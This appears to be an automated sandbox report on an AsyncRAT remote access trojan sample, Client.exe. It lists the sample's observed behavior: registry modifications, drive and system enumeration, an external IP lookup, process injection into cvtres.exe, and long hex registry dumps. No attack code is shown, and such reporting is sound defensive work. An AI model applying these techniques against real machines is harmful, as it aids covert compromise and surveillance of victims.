Analysis Overview
SHA256
3576a2c328055287dfcf6b61a2e5352071a56d7a2f92b0064ac19eecddcbb3ed
Threat Level: Known bad
The file Client.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Asyncrat family
Modifies Installed Components in the registry
Looks up external IP address via web service
Drops desktop.ini file(s)
Checks installed software on the system
Enumerates connected drives
Suspicious use of SetThreadContext
Unsigned PE
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy WMI provider
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-02 17:45
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-02 17:45
Reported
2024-06-02 17:52
Platform
win11-20240426-en
Max time kernel
389s
Max time network
391s
Command Line
Signatures
AsyncRat
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Windows\explorer.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1776 set thread context of 5160 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "676729485" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31110435" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133618240055786960" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2551177587-3778486488-1329702901-1000\{AAF637C0-0530-41D3-8B69-F8D26346EA96} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133586177690776358" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c2006020004002c0010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070400420061007200510065007600690072000a004100620067002000660076007400610072007100200076006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000c41e3609ec97da0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000